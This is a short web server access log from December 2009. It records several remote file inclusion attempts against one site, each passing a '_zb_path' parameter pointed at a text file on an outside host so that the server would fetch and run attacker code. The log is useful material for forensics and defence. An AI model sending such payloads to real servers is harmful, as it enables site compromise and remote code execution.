78.110.50.121 - - [13/Dec/2009:11:18:33 -0800] "GET /logs///?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 200 130081 "-" "Mozilla/5.0" "www.dmulk.com"
80.93.58.162 - - [13/Dec/2009:11:18:37 -0800] "GET /logs/access_080916.log///?_zb_path=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:11:18:39 -0800] "GET /logs/access_081111.log%20%20///?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:11:18:39 -0800] "GET //?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 200 14914 "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:11:18:39 -0800] "GET /logs///?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 200 130081 "-" "Mozilla/5.0" "www.dmulk.com"
